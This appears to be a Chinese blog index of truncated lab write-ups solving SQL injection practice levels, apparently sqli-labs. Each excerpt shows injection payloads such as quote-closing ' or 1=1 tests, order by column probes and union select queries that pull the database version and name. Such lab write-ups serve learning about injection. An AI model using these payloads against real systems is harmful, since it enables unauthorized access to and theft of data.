摘要:
在查询栏输入1,点击查询获得查询格式?name=1'&submit=查询*捷径 ' or 1=1 --+*非捷径?name=1' and 1=2 --+ 2--+&submit=查询用不了,直接查 ?name=1' order by 2--+&submit=查询?name=1' union sele 阅读全文
摘要:
抓包搞到格式id=1&submit=%E6%9F%A5%E8%AF%A2查字符段id=1 order by 2&submit=%E6%9F%A5%E8%AF%A2id=1 union select 1,2&submit=%E6%9F%A5%E8%AF%A2 阅读全文
摘要:
题目:POST - Double Injection - Single quotes- String - with twist 单引号与括号的双注入 先试试 uname=1' or 1=1#&passwd=1&submit=Submit 有报错,但不返回数据库查询的信息了 尝试 uname=1')o 阅读全文
摘要:
题目:POST - Double Injection - Single quotes- String - with twist和上关一模一样uname=1"or 1=1 #&passwd=1&submit=Submit 阅读全文
摘要:
题目:POST - Error Based - Single quotes- String 基于错误的单引号post型字符变形的注入看到有个账密输入口第一反应尝试post注入打开post data在post data 里输入 uname=pppp 'or 1=1#&passwd=1&submit=S 阅读全文
摘要:
题目:POST - Error Based - Double quotes- String - with twist 基于错误的双引号post型字符变形的注入 先抓下包,拿到格式 uname=1#&passwd=1&submit=Submit 根据题目 注入点可能有 " ) 尝试 uname=1" 阅读全文
摘要:
题目:GET - Error based - Single quotes with twist 基于错误的单引号GET型变形注入 ?id=1 )and 1=2--+ ?id=1 "and 1=2--+ ?id=1 %and 1=2--+ 上面都没反应 ?id=1 'and 1=2--+ 跳出 You 阅读全文
摘要:
题目:GET - Error based - Double Quotes - String 基于错误的GET双引号字符型注入 可能的注入点(不全) ' " ) ') ") 观察页面 ?id=1 有正常回显 判断注入点 ?id=1' 正常回显,说明注入点不在单引号的闭合上 尝试朝前括号 ?id=1) 阅读全文
摘要:
题目:GET - Error based - Intiger based 基于错误的数字型注入?id=1?id=1 order by 3?id=-1 union select 1,2,3?id=-1 union select 1,version(),database()版本:5.7.26名字:sec 阅读全文
摘要:
题目:GET - Error based - Single quotes - String 基于错误的单引号GET型字符注入尝试闭合'?id=1 'and 1=2--+有反应,报错了闭合成功,可以注入开始注入?id=1 'order by 5--+?id=1 'order by 4--+?id=1 阅读全文
